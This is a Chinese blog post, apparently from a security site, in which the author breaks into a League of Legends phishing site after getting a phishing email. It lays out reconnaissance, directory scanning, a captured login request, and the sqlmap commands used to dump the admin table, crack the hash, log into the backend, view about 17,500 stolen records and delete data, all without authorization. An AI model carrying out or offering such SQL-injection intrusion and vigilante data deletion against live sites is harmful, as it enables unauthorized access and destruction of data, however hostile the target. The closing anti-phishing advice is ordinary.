当英雄联盟钓鱼网站遇到脚本黑客

2019-10-25 8,539

下午打开QQ邮箱,居然多了一封钓鱼邮件


应该是群发的钓鱼邮件


<鱼叉钓鱼>

详细了解https://baike.baidu.com/item/%E9%B1%BC%E5%8F%89%E5%BC%8F%E7%BD%91%E7%BB%9C%E9%92%93%E9%B1%BC/16763869?fr=aladdin


干他!!!


网址是www.xxxx.com

打开就是这样,直接弹框提示登录

点快捷登录是无效的,其他忘记密码,注册新账号也是无效按钮


思路1:前台这里输入框可以试试XSS,运气好可以插到管理员的后台地址和Cookie信息


LOL钓鱼网站无疑


0x01


这种钓鱼小站


那就常规当信息收集走一波



爱站

https://www.aizhan.com

反查了下注册人和邮箱,没有获得特别有价值的信息


多地ping,无cdn,也不是XX云

http://ping.chinaz.com/

同ip域名查询

https://site.ip138.com/

ip绑定的域名

这个ip上绑定了好几个域名,都是相同模板的钓鱼页面


云悉看看网站指纹信息

http://www.yunsee.cn/

Nginx+PHP环境


0x02


扫描网站目录

利用dirsearch扫描了下目录,发现了www.xxx.cn/history/

打开直接跳后台地址

思路1:Burpsuite爆破后台账号密码

思路2:测试这里是不是有SQL注入


扫端口

只开了80端口


0x03

验证思路


先验证SQL注入

PS:这种无验证码的后台,很大几率存在SQL注入漏洞

Burpsuite抓包

将post包保存为1.txt,在admin后面打上*

标记下sqlmap要跑的参数点

最好使用服务器来跑注入,网络稳定且速度快

POST /history/Verification_admin.php HTTP/1.1
Host: www.xxxx.cn
Content-Length: 30
Cache-Control: max-age=0
Origin: http://www.xxxx.cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://www.xxxx.cn/history/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e31r5gmpl27acjt4fvg48km7f7
Connection: close

username=admin*&password=123456

开始测试注入:

sqlmap -r 1.txt --random-agent --dbs --level 3

运气不错

跑出了库,接着跑一下管理员表和数据就行了

sqlmap -r 1.txt --random-agent --level 3 -D sqlxxxx --tables --batch

管理员表:yunx_admin

sqlmap -r 1.txt --level 3 -D sqlxxxx -T yunx_admin --dump --random-agent --batch

账号密码hash到手

上somd5,成功解开了hash

用户名:qazxxxx

密码:wxxxxxx


验证XSS,发现被过滤了,暂时不管

验证后台后台爆破,都有账户密码了,还爆破个毛啊,哈哈哈


0x04

成功登录后台

 后台信息太少,getshell有点麻烦了,很多功能按钮上无效的

那就只能看数据了,悲惨

数据还挺多,卧槽

17509多条,我的个乖乖,看来很多人的安全意识还是太薄弱了



0x05


功能点太少了,不过这套模板之前好像在哪里见过,改天审计下代码看看


然后又回头看了下,同ip的其他域名

验证了下,同一个数据库,没啥好搞头


枯燥


最后,删除数据,做一名优秀的共产主义接班人

近期LOL世界赛,以及LOL的活动较多

大家谨防钓鱼网站,如遇钓鱼网站并输入了自己的账户密码

请及时更改自己的账户密码


原创投稿作者:渣渣辉

本文作者:HACK_Learn

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/116392.html

Tags:
评论  (0)
快来写下你的想法吧!

HACK_Learn

文章数:142 积分: 323

微信公众号:HACK学习呀

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号